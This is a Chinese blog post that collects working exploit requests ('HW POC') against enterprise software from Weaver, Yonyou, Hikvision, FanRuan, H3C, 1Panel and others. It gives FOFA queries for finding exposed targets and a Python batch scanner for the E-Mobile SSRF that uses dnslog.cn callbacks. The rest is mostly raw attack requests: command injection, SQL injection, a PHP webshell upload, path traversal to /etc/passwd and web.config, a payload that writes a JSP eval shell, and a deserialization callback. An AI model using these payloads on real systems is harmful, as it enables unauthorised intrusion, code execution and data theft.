泛微E-Mobile installOperate.do SSRF漏洞 | HW POC

漏洞描述

泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞，未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口，获取服务的banner信息，窥探网络结构，甚至对内网或本地运行的应用程序发起攻击，获取服务器内部敏感配置，造成信息泄露。

搜索语法

FOFA：

product="泛微-EMobile" || header="EMobileServer"

漏洞复现

GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Connection: close

工具批量

# encoding:utf-8
import time
 
import requests
import argparse
import ssl
import urllib3
import re
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
 
# ssl._create_unverified_context：创建一个 SSL 上下文，用于处理 HTTPS 请求时不验证服务器证书的情况。
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings()：禁用 urllib3 库的不安全请求警告，即不显示由于不安全的 HTTPS 请求而引发的警告信息。
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
# 打印颜色
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'
 
 
def check_vuln(url):
    url = url.strip("/")
 
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
    }
    headers1 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
        "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"
    }
    dnslog_url = "http://dnslog.cn/getdomain.php"
    try:
        getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=15)
        target = url + "/install/installOperate.do?svrurl=http://1.qwe." + getdomain.text
        result_response = requests.get(target, headers=headers, verify=False, timeout=15)
        for i in range(0, 3):
            refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)
            time.sleep(1)
            if getdomain.text in refresh.text:
                print(f"{RED}[+] {url} 存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
                return True
            else:
                print(f"{GREEN}[-] {url} 不存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
                return True
    except Exception as e:
        print(f"{GREEN}[-] {url} 请求失败{RESET}")
 
 
def main():
    parser = argparse.ArgumentParser(description='WeaverE-Mobile-installOperate-SSRF漏洞')
    parser.add_argument('-u', '--url', help='目标URL')
    parser.add_argument('-f', '--file', help='目标URL文件')
    args = parser.parse_args()
    if args.url:
        args.url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url
        check_vuln(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = f.read().splitlines()
            for url in urls:
                url = "http://" + url if not url.startswith(('http://', 'https://')) else url
                check_vuln(url)
 
 
if __name__ == '__main__':
    main()

python .WeaverE-Mobile-installOperate-SSRF.py -f .1.txtpython .WeaverE-Mobile-installOperate-SSRF.py -u 192.168.1.1::8088

HW POC

F-logic DataCube3存在命令执行漏洞(CVE-2024-7066)
fofa:title=="DataCube3"
 
POST /admin/config_time_sync.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
​
accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
 
 
金慧综合管理信息系统SQL注入漏洞
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
  
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
​
 
用友时空KSOA PreviewKPQT SQL注入漏洞
 
fofa: product="用友-时空KSOA"
GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
 
 
帆软ReportServer SQL注入漏洞
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
 
 
金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞
 
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
 
 
百易云资产管理运营系统任意文件上传
POST /comfileup.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050
  
----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"
  
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
 
 
联软安渡UniNXG安全数据交换系统 SQL注入漏洞
 
UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
 
天问物业ERP系统ContractDownLoad存在任意文件读取漏洞
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
 
 
天问物业ERP系统AreaAvatarDownLoad任意文件读取漏洞
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
 
 
用友 NC UserAuthenticationServlet 反序列化漏洞
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 114
​
​
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"1ksla7e.dnslog.cn\"}}}"}
 
 
用友U8Cloud ActionServlet SQL注入
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
 
 
海康威视综合安防管理平台detection存在前台远程命令执行
 
POST /center/api/installation/detection HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8
  
{"type":"environment","operate":"","machines":{"id":  "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
 
 
Bazarrswaggerui组件目录穿越导致任意文件读取漏洞
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
 
 
H3C Workspace 云桌面 远程命令执行漏洞
fofa："H3C Workspace"
 
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined
 
 
1Panel 远程代码执行漏洞
 
GET /.git/config HTTP/1.1
Host: 
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE
test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#Connection: close
 
蓝凌 EKP 远程代码执行漏洞
/ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common
 
 
泛微 e-cology9 /services/WorkPlanService 前台SQL注入
POST /services/WorkPlanService HTTP/1.1
Host: 
Content-Length: 380
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Referer: http://0.0.0.0/services/WorkPlanService
Cookie: ecology_JSessionid=bibwzto5sdeg43J9Fz0iu
Connection: close
​
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(SELECT 123 FROM
(SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
 
 
泛微E-Mobile installOperate.do SSRF漏洞
 
FOFA：header="EMobileServer"
 
GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
 
亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞
 
fofa: app="亿赛通-DLP"
 
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
​
command=delNotice¬iceId=111';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
 
 
亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞
 
fofa: app="亿赛通-DLP"
 
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: x.x.x.x
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
​
command=updateNetSec&state=*

原文始发于微信公众号（扫地僧的茶饭日常）：【漏洞复现】泛微E-Mobile installOperate.do SSRF漏洞 | HW POC